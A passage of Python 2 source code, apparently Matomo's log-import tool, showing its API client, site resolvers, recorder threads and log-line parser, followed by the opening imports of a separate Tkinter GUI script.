['%s (ID: %d)' % (hostname, site_id) for hostname, site_id in self.matomo_sites_created],
level=3,
),
'total_sites_ignored': len(self.matomo_sites_ignored),
'sites_ignored': self._indent_text(
self.matomo_sites_ignored, level=3,
),
'sites_ignored_tips': '''
TIPs:
- if one of these hosts is an alias host for one of the websites
in Matomo, you can add this host as an "Alias URL" in Settings > Websites.
- use --add-sites-new-hosts if you wish to automatically create
one website for each of these hosts in Matomo rather than discarding
these requests.
- use --idsite-fallback to force all these log lines with a new hostname
to be recorded in a specific idsite (for example for troubleshooting/visualizing the data)
- use --idsite to force all lines in the specified log files
to be all recorded in the specified idsite
- or you can also manually create a new Website in Matomo with the URL set to this hostname
''' if self.matomo_sites_ignored else '',
'total_time': self.time_stop - self.time_start,
'speed_recording': self._round_value(self._compute_speed(
self.count_lines_recorded.value,
self.time_start, self.time_stop,
)),
'url': config.options.matomo_api_url,
'invalid_lines': invalid_lines_summary
})
##
## The monitor is a thread that prints a short summary each second.
##
def _monitor(self):
latest_total_recorded = 0
while not self.monitor_stop:
current_total = stats.count_lines_recorded.value
time_elapsed = time.time() - self.time_start
print('%d lines parsed, %d lines recorded, %d records/sec (avg), %d records/sec (current)' % (
stats.count_lines_parsed.value,
current_total,
current_total / time_elapsed if time_elapsed != 0 else 0,
(current_total - latest_total_recorded) / config.options.show_progress_delay,
))
latest_total_recorded = current_total
time.sleep(config.options.show_progress_delay)
def start_monitor(self):
t = threading.Thread(target=self._monitor)
t.daemon = True
t.start()
def stop_monitor(self):
self.monitor_stop = True
class UrlHelper(object):
@staticmethod
def convert_array_args(args):
"""
Converts PHP deep query param arrays (eg, w/ names like hsr_ev[abc][0][]=value) into a nested list/dict
structure that will convert correctly to JSON.
"""
final_args = {}
for key, value in args.iteritems():
indices = key.split('[')
if '[' in key:
# contains list of all indices, eg for abc[def][ghi][] = 123, indices would be ['abc', 'def', 'ghi', '']
indices = [i.rstrip(']') for i in indices]
# navigate the multidimensional array final_args, creating lists/dicts when needed, using indices
element = final_args
for i in range(0, len(indices) - 1):
idx = indices[i]
# if there's no next key, then this element is a list, otherwise a dict
element_type = list if not indices[i + 1] else dict
if idx not in element or not isinstance(element[idx], element_type):
element[idx] = element_type()
element = element[idx]
# set the value in the final container we navigated to
if not indices[-1]: # last indice is '[]'
element.append(value)
else: # last indice has a key, eg, '[abc]'
element[indices[-1]] = value
else:
final_args[key] = value
return UrlHelper._convert_dicts_to_arrays(final_args)
@staticmethod
def _convert_dicts_to_arrays(d):
# convert dicts that have contiguous integer keys to arrays
for key, value in d.iteritems():
if not isinstance(value, dict):
continue
if UrlHelper._has_contiguous_int_keys(value):
d[key] = UrlHelper._convert_dict_to_array(value)
else:
d[key] = UrlHelper._convert_dicts_to_arrays(value)
return d
@staticmethod
def _has_contiguous_int_keys(d):
for i in range(0, len(d)):
if str(i) not in d:
return False
return True
@staticmethod
def _convert_dict_to_array(d):
result = []
for i in range(0, len(d)):
result.append(d[str(i)])
return result
class Matomo(object):
"""
Make requests to Matomo.
"""
class Error(Exception):
def __init__(self, message, code = None):
super(Exception, self).__init__(message)
self.code = code
class RedirectHandlerWithLogging(urllib2.HTTPRedirectHandler):
"""
Special implementation of HTTPRedirectHandler that logs redirects in debug mode
to help users debug system issues.
"""
def redirect_request(self, req, fp, code, msg, hdrs, newurl):
logging.debug("Request redirected (code: %s) to '%s'" % (code, newurl))
return urllib2.HTTPRedirectHandler.redirect_request(self, req, fp, code, msg, hdrs, newurl)
@staticmethod
def _call(path, args, headers=None, url=None, data=None):
"""
Make a request to the Matomo site. It is up to the caller to format
arguments, to embed authentication, etc.
"""
if url is None:
url = config.options.matomo_url
headers = headers or {}
if data is None:
# If Content-Type isn't defined, PHP do not parse the request's body.
headers['Content-type'] = 'application/x-www-form-urlencoded'
data = urllib.urlencode(args)
elif not isinstance(data, basestring) and headers['Content-type'] == 'application/json':
data = json.dumps(data)
if args:
path = path + '?' + urllib.urlencode(args)
if config.options.request_suffix:
path = path + ('&' if '?' in path else '?') + config.options.request_suffix
headers['User-Agent'] = 'Matomo/LogImport'
try:
timeout = config.options.request_timeout
except:
timeout = None # the config global object may not be created at this point
request = urllib2.Request(url + path, data, headers)
# Handle basic auth if auth_user set
try:
auth_user = config.options.auth_user
auth_password = config.options.auth_password
except:
auth_user = None
auth_password = None
if auth_user is not None:
base64string = base64.encodestring('%s:%s' % (auth_user, auth_password)).replace('\n', '')
request.add_header("Authorization", "Basic %s" % base64string)
# Use non-default SSL context if invalid certificates shall be
# accepted.
if config.options.accept_invalid_ssl_certificate and \
sys.version_info >= (2, 7, 9):
ssl_context = ssl.create_default_context()
ssl_context.check_hostname = False
ssl_context.verify_mode = ssl.CERT_NONE
https_handler_args = {'context': ssl_context}
else:
https_handler_args = {}
opener = urllib2.build_opener(
Matomo.RedirectHandlerWithLogging(),
urllib2.HTTPSHandler(**https_handler_args))
response = opener.open(request, timeout = timeout)
result = response.read()
response.close()
return result
@staticmethod
def _call_api(method, **kwargs):
"""
Make a request to the Matomo API taking care of authentication, body
formatting, etc.
"""
args = {
'module' : 'API',
'format' : 'json2',
'method' : method,
'filter_limit' : '-1',
}
# token_auth, by default, is taken from config.
token_auth = kwargs.pop('_token_auth', None)
if token_auth is None:
token_auth = config.options.matomo_token_auth
if token_auth:
args['token_auth'] = token_auth
url = kwargs.pop('_url', None)
if url is None:
url = config.options.matomo_api_url
if kwargs:
args.update(kwargs)
# Convert lists into appropriate format.
# See: http://developer.matomo.org/api-reference/reporting-api#passing-an-array-of-data-as-a-parameter
# Warning: we have to pass the parameters in order: foo[0], foo[1], foo[2]
# and not foo[1], foo[0], foo[2] (it will break Matomo otherwise.)
final_args = []
for key, value in args.iteritems():
if isinstance(value, (list, tuple)):
for index, obj in enumerate(value):
final_args.append(('%s[%d]' % (key, index), obj))
else:
final_args.append((key, value))
# logging.debug('%s' % final_args)
# logging.debug('%s' % url)
res = Matomo._call('/', final_args, url=url)
try:
return json.loads(res)
except ValueError:
raise urllib2.URLError('Matomo returned an invalid response: ' + res)
@staticmethod
def _call_wrapper(func, expected_response, on_failure, *args, **kwargs):
"""
Try to make requests to Matomo at most MATOMO_FAILURE_MAX_RETRY times.
"""
errors = 0
while True:
try:
response = func(*args, **kwargs)
if expected_response is not None and response != expected_response:
if on_failure is not None:
error_message = on_failure(response, kwargs.get('data'))
else:
error_message = "didn't receive the expected response. Response was %s " % response
raise urllib2.URLError(error_message)
return response
except (urllib2.URLError, httplib.HTTPException, ValueError, socket.timeout) as e:
logging.info('Error when connecting to Matomo: %s', e)
code = None
if isinstance(e, urllib2.HTTPError):
# See Python issue 13211.
message = 'HTTP Error %s %s' % (e.code, e.msg)
code = e.code
elif isinstance(e, urllib2.URLError):
message = e.reason
else:
message = str(e)
# decorate message w/ HTTP response, if it can be retrieved
if hasattr(e, 'read'):
message = message + ", response: " + e.read()
try:
delay_after_failure = config.options.delay_after_failure
max_attempts = config.options.max_attempts
except NameError:
delay_after_failure = MATOMO_DEFAULT_DELAY_AFTER_FAILURE
max_attempts = MATOMO_DEFAULT_MAX_ATTEMPTS
errors += 1
if errors == max_attempts:
logging.info("Max number of attempts reached, server is unreachable!")
raise Matomo.Error(message, code)
else:
logging.info("Retrying request, attempt number %d" % (errors + 1))
time.sleep(delay_after_failure)
@classmethod
def call(cls, path, args, expected_content=None, headers=None, data=None, on_failure=None):
return cls._call_wrapper(cls._call, expected_content, on_failure, path, args, headers,
data=data)
@classmethod
def call_api(cls, method, **kwargs):
return cls._call_wrapper(cls._call_api, None, None, method, **kwargs)
##
## Resolvers.
##
## A resolver is a class that turns a hostname into a Matomo site ID.
##
class StaticResolver(object):
"""
Always return the same site ID, specified in the configuration.
"""
def __init__(self, site_id):
self.site_id = site_id
# Go get the main URL
site = matomo.call_api(
'SitesManager.getSiteFromId', idSite=self.site_id
)
if site.get('result') == 'error':
fatal_error(
"cannot get the main URL of this site: %s" % site.get('message')
)
self._main_url = site['main_url']
stats.matomo_sites.add(self.site_id)
def resolve(self, hit):
return (self.site_id, self._main_url)
def check_format(self, format):
pass
class DynamicResolver(object):
"""
Use Matomo API to determine the site ID.
"""
_add_site_lock = threading.Lock()
def __init__(self):
self._cache = {}
if config.options.replay_tracking:
# get existing sites
self._cache['sites'] = matomo.call_api('SitesManager.getAllSites')
def _get_site_id_from_hit_host(self, hit):
return matomo.call_api(
'SitesManager.getSitesIdFromSiteUrl',
url=hit.host,
)
def _add_site(self, hit):
main_url = 'http://' + hit.host
DynamicResolver._add_site_lock.acquire()
try:
# After we obtain the lock, make sure the site hasn't already been created.
res = self._get_site_id_from_hit_host(hit)
if res:
return res[0]['idsite']
# The site doesn't exist.
logging.debug('No Matomo site found for the hostname: %s', hit.host)
if config.options.site_id_fallback is not None:
logging.debug('Using default site for hostname: %s', hit.host)
return config.options.site_id_fallback
elif config.options.add_sites_new_hosts:
if config.options.dry_run:
# Let's just return a fake ID.
return 0
logging.debug('Creating a Matomo site for hostname %s', hit.host)
result = matomo.call_api(
'SitesManager.addSite',
siteName=hit.host,
urls=[main_url],
)
if result.get('result') == 'error':
logging.error("Couldn't create a Matomo site for host %s: %s",
hit.host, result.get('message'),
)
return None
else:
site_id = result['value']
stats.matomo_sites_created.append((hit.host, site_id))
return site_id
else:
# The site doesn't exist, we don't want to create new sites and
# there's no default site ID. We thus have to ignore this hit.
return None
finally:
DynamicResolver._add_site_lock.release()
def _resolve(self, hit):
res = self._get_site_id_from_hit_host(hit)
if res:
# The site already exists.
site_id = res[0]['idsite']
else:
site_id = self._add_site(hit)
if site_id is not None:
stats.matomo_sites.add(site_id)
return site_id
def _resolve_when_replay_tracking(self, hit):
"""
If parsed site ID found in the _cache['sites'] return site ID and main_url,
otherwise return (None, None) tuple.
"""
site_id = hit.args['idsite']
if site_id in self._cache['sites']:
stats.matomo_sites.add(site_id)
return (site_id, self._cache['sites'][site_id]['main_url'])
else:
return (None, None)
def _resolve_by_host(self, hit):
"""
Returns the site ID and site URL for a hit based on the hostname.
"""
try:
site_id = self._cache[hit.host]
except KeyError:
logging.debug(
'Site ID for hostname %s not in cache', hit.host
)
site_id = self._resolve(hit)
logging.debug('Site ID for hostname %s: %s', hit.host, site_id)
self._cache[hit.host] = site_id
return (site_id, 'http://' + hit.host)
def resolve(self, hit):
"""
Return the site ID from the cache if found, otherwise call _resolve.
If replay_tracking option is enabled, call _resolve_when_replay_tracking.
"""
if config.options.replay_tracking:
# We only consider requests with piwik.php which don't need host to be imported
return self._resolve_when_replay_tracking(hit)
else:
# Workaround for empty Host bug issue #126
if hit.host.strip() == '':
hit.host = 'no-hostname-found-in-log'
return self._resolve_by_host(hit)
def check_format(self, format):
if config.options.replay_tracking:
pass
elif format.regex is not None and 'host' not in format.regex.groupindex and not config.options.log_hostname:
fatal_error(
"the selected log format doesn't include the hostname: you must "
"specify the Matomo site ID with the --idsite argument"
)
class Recorder(object):
"""
A Recorder fetches hits from the Queue and inserts them into Matomo using
the API.
"""
recorders = []
def __init__(self):
self.queue = Queue.Queue(maxsize=2)
# if bulk tracking disabled, make sure we can store hits outside of the Queue
if not config.options.use_bulk_tracking:
self.unrecorded_hits = []
@classmethod
def launch(cls, recorder_count):
"""
Launch a bunch of Recorder objects in a separate thread.
"""
for i in xrange(recorder_count):
recorder = Recorder()
cls.recorders.append(recorder)
run = recorder._run_bulk if config.options.use_bulk_tracking else recorder._run_single
t = threading.Thread(target=run)
t.daemon = True
t.start()
logging.debug('Launched recorder')
@classmethod
def add_hits(cls, all_hits):
"""
Add a set of hits to the recorders queue.
"""
# Organize hits so that one client IP will always use the same queue.
# We have to do this so visits from the same IP will be added in the right order.
hits_by_client = [[] for r in cls.recorders]
for hit in all_hits:
hits_by_client[hit.get_visitor_id_hash() % len(cls.recorders)].append(hit)
for i, recorder in enumerate(cls.recorders):
recorder.queue.put(hits_by_client[i])
@classmethod
def wait_empty(cls):
"""
Wait until all recorders have an empty queue.
"""
for recorder in cls.recorders:
recorder._wait_empty()
def _run_bulk(self):
while True:
try:
hits = self.queue.get()
except:
# TODO: we should log something here, however when this happens, logging.etc will throw
return
if len(hits) > 0:
try:
self._record_hits(hits)
except Matomo.Error as e:
fatal_error(e, hits[0].filename, hits[0].lineno) # approximate location of error
self.queue.task_done()
def _run_single(self):
while True:
if config.options.force_one_action_interval != False:
time.sleep(config.options.force_one_action_interval)
if len(self.unrecorded_hits) > 0:
hit = self.unrecorded_hits.pop(0)
try:
self._record_hits([hit])
except Matomo.Error as e:
fatal_error(e, hit.filename, hit.lineno)
else:
self.unrecorded_hits = self.queue.get()
self.queue.task_done()
def _wait_empty(self):
"""
Wait until the queue is empty.
"""
while True:
if self.queue.empty():
# We still have to wait for the last queue item being processed
# (queue.empty() returns True before queue.task_done() is
# called).
self.queue.join()
return
time.sleep(1)
def date_to_matomo(self, date):
date, time = date.isoformat(sep=' ').split()
return '%s %s' % (date, time.replace('-', ':'))
def _get_hit_args(self, hit):
"""
Returns the args used in tracking a hit, without the token_auth.
"""
site_id, main_url = resolver.resolve(hit)
if site_id is None:
# This hit doesn't match any known Matomo site.
if config.options.replay_tracking:
stats.matomo_sites_ignored.add('unrecognized site ID %s' % hit.args.get('idsite'))
else:
stats.matomo_sites_ignored.add(hit.host)
stats.count_lines_no_site.increment()
return
stats.dates_recorded.add(hit.date.date())
path = hit.path
if hit.query_string and not config.options.strip_query_string:
path += config.options.query_string_delimiter + hit.query_string
# only prepend main url / host if it's a path
url_prefix = self._get_host_with_protocol(hit.host, main_url) if hasattr(hit, 'host') else main_url
url = (url_prefix if path.startswith('/') else '') + path[:1024]
# handle custom variables before generating args dict
if config.options.enable_bots:
if hit.is_robot:
hit.add_visit_custom_var("Bot", hit.user_agent)
else:
hit.add_visit_custom_var("Not-Bot", hit.user_agent)
hit.add_page_custom_var("HTTP-code", hit.status)
args = {
'rec': '1',
'apiv': '1',
'url': url.encode('utf8'),
'urlref': hit.referrer[:1024].encode('utf8'),
'cip': hit.ip,
'cdt': self.date_to_matomo(hit.date),
'idsite': site_id,
'dp': '0' if config.options.reverse_dns else '1',
'ua': hit.user_agent.encode('utf8')
}
if config.options.replay_tracking:
# prevent request to be force recorded when option replay-tracking
args['rec'] = '0'
# idsite is already determined by resolver
if 'idsite' in hit.args:
del hit.args['idsite']
args.update(hit.args)
if hit.is_download:
args['download'] = args['url']
if config.options.enable_bots:
args['bots'] = '1'
if hit.is_error or hit.is_redirect:
args['action_name'] = '%s%sURL = %s%s' % (
hit.status,
config.options.title_category_delimiter,
urllib.quote(args['url'], ''),
("%sFrom = %s" % (
config.options.title_category_delimiter,
urllib.quote(args['urlref'], '')
) if args['urlref'] != '' else '')
)
if hit.generation_time_milli > 0:
args['gt_ms'] = int(hit.generation_time_milli)
if hit.event_category and hit.event_action:
args['e_c'] = hit.event_category
args['e_a'] = hit.event_action
if hit.event_name:
args['e_n'] = hit.event_name
if hit.length:
args['bw_bytes'] = hit.length
# convert custom variable args to JSON
if 'cvar' in args and not isinstance(args['cvar'], basestring):
args['cvar'] = json.dumps(args['cvar'])
if '_cvar' in args and not isinstance(args['_cvar'], basestring):
args['_cvar'] = json.dumps(args['_cvar'])
return UrlHelper.convert_array_args(args)
def _get_host_with_protocol(self, host, main_url):
if '://' not in host:
parts = urlparse.urlparse(main_url)
host = parts.scheme + '://' + host
return host
def _record_hits(self, hits):
"""
Inserts several hits into Matomo.
"""
if not config.options.dry_run:
data = {
'token_auth': config.options.matomo_token_auth,
'requests': [self._get_hit_args(hit) for hit in hits]
}
try:
args = {}
if config.options.debug_tracker:
args['debug'] = '1'
response = matomo.call(
'/piwik.php', args=args,
expected_content=None,
headers={'Content-type': 'application/json'},
data=data,
on_failure=self._on_tracking_failure
)
if config.options.debug_tracker:
logging.debug('tracker response:\n%s' % response)
# check for invalid requests
try:
response = json.loads(response)
except:
logging.info("bulk tracking returned invalid JSON")
# don't display the tracker response if we're debugging the tracker.
# debug tracker output will always break the normal JSON output.
if not config.options.debug_tracker:
logging.info("tracker response:\n%s" % response)
response = {}
if ('invalid_indices' in response and isinstance(response['invalid_indices'], list) and
response['invalid_indices']):
invalid_count = len(response['invalid_indices'])
invalid_lines = [str(hits[index].lineno) for index in response['invalid_indices']]
invalid_lines_str = ", ".join(invalid_lines)
stats.invalid_lines.extend(invalid_lines)
logging.info("The Matomo tracker identified %s invalid requests on lines: %s" % (invalid_count, invalid_lines_str))
elif 'invalid' in response and response['invalid'] > 0:
logging.info("The Matomo tracker identified %s invalid requests." % response['invalid'])
except Matomo.Error as e:
# if the server returned 400 code, BulkTracking may not be enabled
if e.code == 400:
fatal_error("Server returned status 400 (Bad Request).\nIs the BulkTracking plugin disabled?", hits[0].filename, hits[0].lineno)
raise
stats.count_lines_recorded.advance(len(hits))
def _is_json(self, result):
try:
json.loads(result)
return True
except ValueError as e:
return False
def _on_tracking_failure(self, response, data):
"""
Removes the successfully tracked hits from the request payload so
they are not logged twice.
"""
try:
response = json.loads(response)
except:
# the response should be in JSON, but in case it can't be parsed just try another attempt
logging.debug("cannot parse tracker response, should be valid JSON")
return response
# remove the successfully tracked hits from payload
tracked = response['tracked']
data['requests'] = data['requests'][tracked:]
return response['message']
class Hit(object):
"""
It's a simple container.
"""
def __init__(self, **kwargs):
for key, value in kwargs.iteritems():
setattr(self, key, value)
super(Hit, self).__init__()
if config.options.force_lowercase_path:
self.full_path = self.full_path.lower()
def get_visitor_id_hash(self):
visitor_id = self.ip
if config.options.replay_tracking:
for param_name_to_use in ['uid', 'cid', '_id', 'cip']:
if param_name_to_use in self.args:
visitor_id = self.args[param_name_to_use]
break
return abs(hash(visitor_id))
def add_page_custom_var(self, key, value):
"""
Adds a page custom variable to this Hit.
"""
self._add_custom_var(key, value, 'cvar')
def add_visit_custom_var(self, key, value):
"""
Adds a visit custom variable to this Hit.
"""
self._add_custom_var(key, value, '_cvar')
def _add_custom_var(self, key, value, api_arg_name):
if api_arg_name not in self.args:
self.args[api_arg_name] = {}
if isinstance(self.args[api_arg_name], basestring):
logging.debug("Ignoring custom %s variable addition [ %s = %s ], custom var already set to string." % (api_arg_name, key, value))
return
index = len(self.args[api_arg_name]) + 1
self.args[api_arg_name][index] = [key, value]
class Parser(object):
"""
The Parser parses the lines in a specified file and inserts them into
a Queue.
"""
def __init__(self):
self.check_methods = [method for name, method
in inspect.getmembers(self, predicate=inspect.ismethod)
if name.startswith('check_')]
## All check_* methods are called for each hit and must return True if the
## hit can be imported, False otherwise.
def check_hostname(self, hit):
# Check against config.hostnames.
if not hasattr(hit, 'host') or not config.options.hostnames:
return True
# Accept the hostname only if it matches one pattern in the list.
result = any(
fnmatch.fnmatch(hit.host, pattern)
for pattern in config.options.hostnames
)
if not result:
stats.count_lines_hostname_skipped.increment()
return result
def check_static(self, hit):
if hit.extension in STATIC_EXTENSIONS:
if config.options.enable_static:
hit.is_download = True
return True
else:
stats.count_lines_static.increment()
return False
return True
def check_download(self, hit):
if hit.extension in config.options.download_extensions:
stats.count_lines_downloads.increment()
hit.is_download = True
return True
# the file is not in the white-listed downloads
# if it's a know download file, we shall skip it
elif hit.extension in DOWNLOAD_EXTENSIONS:
stats.count_lines_skipped_downloads.increment()
return False
return True
def check_user_agent(self, hit):
user_agent = hit.user_agent.lower()
for s in itertools.chain(EXCLUDED_USER_AGENTS, config.options.excluded_useragents):
if s in user_agent:
if config.options.enable_bots:
hit.is_robot = True
return True
else:
stats.count_lines_skipped_user_agent.increment()
return False
return True
def check_http_error(self, hit):
if hit.status[0] in ('4', '5'):
if config.options.replay_tracking:
# process error logs for replay tracking, since we don't care if matomo error-ed the first time
return True
elif config.options.enable_http_errors:
hit.is_error = True
return True
else:
stats.count_lines_skipped_http_errors.increment()
return False
return True
def check_http_redirect(self, hit):
if hit.status[0] == '3' and hit.status != '304':
if config.options.enable_http_redirects:
hit.is_redirect = True
return True
else:
stats.count_lines_skipped_http_redirects.increment()
return False
return True
def check_path(self, hit):
for excluded_path in config.options.excluded_paths:
if fnmatch.fnmatch(hit.path, excluded_path):
return False
# By default, all paths are included.
if config.options.included_paths:
for included_path in config.options.included_paths:
if fnmatch.fnmatch(hit.path, included_path):
return True
return False
return True
@staticmethod
def check_format(lineOrFile):
format = False
format_groups = 0
for name, candidate_format in FORMATS.iteritems():
logging.debug("Check format %s", name)
# skip auto detection for formats that can't be detected automatically
if name == 'ovh':
continue
match = None
try:
if isinstance(lineOrFile, basestring):
match = candidate_format.check_format_line(lineOrFile)
else:
match = candidate_format.check_format(lineOrFile)
except Exception as e:
logging.debug('Error in format checking: %s', traceback.format_exc())
pass
if match:
logging.debug('Format %s matches', name)
# compare format groups if this *BaseFormat has groups() method
try:
# if there's more info in this match, use this format
match_groups = len(match.groups())
logging.debug('Format match contains %d groups' % match_groups)
if format_groups < match_groups:
format = candidate_format
format_groups = match_groups
except AttributeError:
format = candidate_format
else:
logging.debug('Format %s does not match', name)
# if the format is W3cExtendedFormat, check if the logs are from IIS and if so, issue a warning if the
# --w3c-time-taken-milli option isn't set
if isinstance(format, W3cExtendedFormat):
format.check_for_iis_option()
return format
@staticmethod
def detect_format(file):
"""
Return the best matching format for this file, or None if none was found.
"""
logging.debug('Detecting the log format')
format = False
# check the format using the file (for formats like the W3cExtendedFormat one)
format = Parser.check_format(file)
# check the format using the first N lines (to avoid irregular ones)
lineno = 0
limit = 100000
while not format and lineno < limit:
line = file.readline()
if not line: # if at eof, don't keep looping
break
lineno = lineno + 1
logging.debug("Detecting format against line %i" % lineno)
format = Parser.check_format(line)
try:
file.seek(0)
except IOError:
pass
if not format:
fatal_error("cannot automatically determine the log format using the first %d lines of the log file. " % limit +
"\nMaybe try specifying the format with the --log-format-name command line argument." )
return
logging.debug('Format %s is the best match', format.name)
return format
def is_filtered(self, hit):
host = None
if hasattr(hit, 'host'):
host = hit.host
else:
try:
host = urlparse.urlparse(hit.path).hostname
except:
pass
if host:
if config.options.exclude_host and len(config.options.exclude_host) > 0 and host in config.options.exclude_host:
return (True, 'host matched --exclude-host')
if config.options.include_host and len(config.options.include_host) > 0 and host not in config.options.include_host:
return (True, 'host did not match --include-host')
if config.options.exclude_older_than and hit.date < config.options.exclude_older_than:
return (True, 'date is older than --exclude-older-than')
if config.options.exclude_newer_than and hit.date > config.options.exclude_newer_than:
return (True, 'date is newer than --exclude-newer-than')
return (False, None)
def parse(self, filename):
"""
Parse the specified filename and insert hits in the queue.
"""
def invalid_line(line, reason):
stats.count_lines_invalid.increment()
if config.options.debug >= 2:
logging.debug('Invalid line detected (%s): %s' % (reason, line))
def filtered_line(line, reason):
stats.count_lines_filtered.increment()
if config.options.debug >= 2:
logging.debug('Filtered line out (%s): %s' % (reason, line))
if filename == '-':
filename = '(stdin)'
file = sys.stdin
else:
if not os.path.exists(filename):
print >> sys.stderr, "\n=====> Warning: File %s does not exist <=====" % filename
return
else:
if filename.endswith('.bz2'):
open_func = bz2.BZ2File
elif filename.endswith('.gz'):
open_func = gzip.open
else:
open_func = open
file = open_func(filename, 'r')
if config.options.show_progress:
print('Parsing log %s...' % filename)
if config.format:
# The format was explicitely specified.
format = config.format
if isinstance(format, W3cExtendedFormat):
format.create_regex(file)
if format.regex is None:
return fatal_error(
"File is not in the correct format, is there a '#Fields:' line? "
"If not, use the --w3c-fields option."
)
else:
# If the file is empty, don't bother.
data = file.read(100)
if len(data.strip()) == 0:
return
try:
file.seek(0)
except IOError:
pass
format = self.detect_format(file)
if format is None:
return fatal_error(
'Cannot guess the logs format. Please give one using '
'either the --log-format-name or --log-format-regex option'
)
# Make sure the format is compatible with the resolver.
resolver.check_format(format)
if config.options.dump_log_regex:
logging.info("Using format '%s'." % format.name)
if format.regex:
logging.info("Regex being used: %s" % format.regex.pattern)
else:
logging.info("Format %s does not use a regex to parse log lines." % format.name)
logging.info("--dump-log-regex option used, aborting log import.")
os._exit(0)
valid_lines_count = 0
hits = []
lineno = -1
while True:
line = file.readline()
if not line: break
lineno = lineno + 1
try:
line = line.decode(config.options.encoding)
except UnicodeDecodeError:
invalid_line(line, 'invalid encoding')
continue
stats.count_lines_parsed.increment()
if stats.count_lines_parsed.value <= config.options.skip:
continue
match = format.match(line)
if not match:
invalid_line(line, 'line did not match')
continue
valid_lines_count = valid_lines_count + 1
if config.options.debug_request_limit and valid_lines_count >= config.options.debug_request_limit:
if len(hits) > 0:
Recorder.add_hits(hits)
logging.info("Exceeded limit specified in --debug-request-limit, exiting.")
return
hit = Hit(
filename=filename,
lineno=lineno,
status=format.get('status'),
full_path=format.get('path'),
is_download=False,
is_robot=False,
is_error=False,
is_redirect=False,
args={},
)
if config.options.regex_group_to_page_cvars_map:
self._add_custom_vars_from_regex_groups(hit, format, config.options.regex_group_to_page_cvars_map, True)
if config.options.regex_group_to_visit_cvars_map:
self._add_custom_vars_from_regex_groups(hit, format, config.options.regex_group_to_visit_cvars_map, False)
if config.options.regex_groups_to_ignore:
format.remove_ignored_groups(config.options.regex_groups_to_ignore)
# Add http method page cvar
try:
httpmethod = format.get('method')
if config.options.track_http_method and httpmethod != '-':
hit.add_page_custom_var('HTTP-method', httpmethod)
except:
pass
try:
hit.query_string = format.get('query_string')
hit.path = hit.full_path
except BaseFormatException:
hit.path, _, hit.query_string = hit.full_path.partition(config.options.query_string_delimiter)
# W3cExtendedFormat detaults to - when there is no query string, but we want empty string
if hit.query_string == '-':
hit.query_string = ''
hit.extension = hit.path.rsplit('.')[-1].lower()
try:
hit.referrer = format.get('referrer')
if hit.referrer.startswith('"'):
hit.referrer = hit.referrer[1:-1]
except BaseFormatException:
hit.referrer = ''
if hit.referrer == '-':
hit.referrer = ''
try:
hit.user_agent = format.get('user_agent')
# in case a format parser included enclosing quotes, remove them so they are not
# sent to Matomo
if hit.user_agent.startswith('"'):
hit.user_agent = hit.user_agent[1:-1]
except BaseFormatException:
hit.user_agent = ''
hit.ip = format.get('ip')
try:
hit.length = int(format.get('length'))
except (ValueError, BaseFormatException):
# Some lines or formats don't have a length (e.g. 304 redirects, W3C logs)
hit.length = 0
try:
hit.generation_time_milli = float(format.get('generation_time_milli'))
except (ValueError, BaseFormatException):
try:
hit.generation_time_milli = float(format.get('generation_time_micro')) / 1000
except (ValueError, BaseFormatException):
try:
hit.generation_time_milli = float(format.get('generation_time_secs')) * 1000
except (ValueError, BaseFormatException):
hit.generation_time_milli = 0
if config.options.log_hostname:
hit.host = config.options.log_hostname
else:
try:
hit.host = format.get('host').lower().strip('.')
if hit.host.startswith('"'):
hit.host = hit.host[1:-1]
except BaseFormatException:
# Some formats have no host.
pass
# Add userid
try:
hit.userid = None
userid = format.get('userid')
if userid != '-':
hit.args['uid'] = hit.userid = userid
except:
pass
# add event info
try:
hit.event_category = hit.event_action = hit.event_name = None
hit.event_category = format.get('event_category')
hit.event_action = format.get('event_action')
hit.event_name = format.get('event_name')
if hit.event_name == '-':
hit.event_name = None
except:
pass
# Check if the hit must be excluded.
if not all((method(hit) for method in self.check_methods)):
continue
# Parse date.
# We parse it after calling check_methods as it's quite CPU hungry, and
# we want to avoid that cost for excluded hits.
date_string = format.get('date')
try:
hit.date = datetime.datetime.strptime(date_string, format.date_format)
hit.date += datetime.timedelta(seconds = config.options.seconds_to_add_to_date)
except ValueError as e:
invalid_line(line, 'invalid date or invalid format: %s' % str(e))
continue
# Parse timezone and substract its value from the date
try:
timezone = float(format.get('timezone'))
except BaseFormatException:
timezone = 0
except ValueError:
invalid_line(line, 'invalid timezone')
continue
if timezone:
hit.date -= datetime.timedelta(hours=timezone/100)
if config.options.replay_tracking:
# we need a query string and we only consider requests with piwik.php
if not hit.query_string or not hit.path.lower().endswith(config.options.replay_tracking_expected_tracker_file):
invalid_line(line, 'no query string, or ' + hit.path.lower() + ' does not end with piwik.php')
continue
query_arguments = urlparse.parse_qs(hit.query_string)
if not "idsite" in query_arguments:
invalid_line(line, 'missing idsite')
continue
try:
hit.args.update((k, v.pop().encode('raw_unicode_escape').decode(config.options.encoding)) for k, v in query_arguments.iteritems())
except UnicodeDecodeError:
invalid_line(line, 'invalid encoding')
continue
(is_filtered, reason) = self.is_filtered(hit)
if is_filtered:
filtered_line(line, reason)
continue
hits.append(hit)
if len(hits) >= config.options.recorder_max_payload_size * len(Recorder.recorders):
Recorder.add_hits(hits)
hits = []
# add last chunk of hits
if len(hits) > 0:
Recorder.add_hits(hits)
def _add_custom_vars_from_regex_groups(self, hit, format, groups, is_page_var):
for group_name, custom_var_name in groups.iteritems():
if group_name in format.get_all():
value = format.get(group_name)
# don't track the '-' empty placeholder value
if value == '-':
continue
if is_page_var:
hit.add_page_custom_var(custom_var_name, value)
else:
hit.add_visit_custom_var(custom_var_name, value)
def main():
"""
Start the importing process.
"""
stats.set_time_start()
if config.options.show_progress:
stats.start_monitor()
recorders = Recorder.launch(config.options.recorders)
try:
for filename in config.filenames:
parser.parse(filename)
Recorder.wait_empty()
except KeyboardInterrupt:
pass
stats.set_time_stop()
if config.options.show_progress:
stats.stop_monitor()
stats.print_summary()
def fatal_error(error, filename=None, lineno=None):
print >> sys.stderr, 'Fatal error: %s' % error
if filename and lineno is not None:
print >> sys.stderr, (
'You can restart the import of "%s" from the point it failed by '
'specifying --skip=%d on the command line.\n' % (filename, lineno)
)
os._exit(1)
if __name__ == '__main__':
try:
config = Configuration()
# The matomo object depends on the config object, so we have to create
# it after creating the configuration.
matomo = Matomo()
# The init_token_auth method may need the matomo option, so we must call
# it after creating the matomo object.
config.init_token_auth()
stats = Statistics()
resolver = config.get_resolver()
parser = Parser()
main()
sys.exit(0)
except KeyboardInterrupt:
pass
|
vh-gui.py
|
#!/usr/bin/python
import Tkinter
from Tkinter import *
import urllib
import json
import ConfigParser
import os
import subprocess
from threading import Thread
from Queue import Queue, Empty
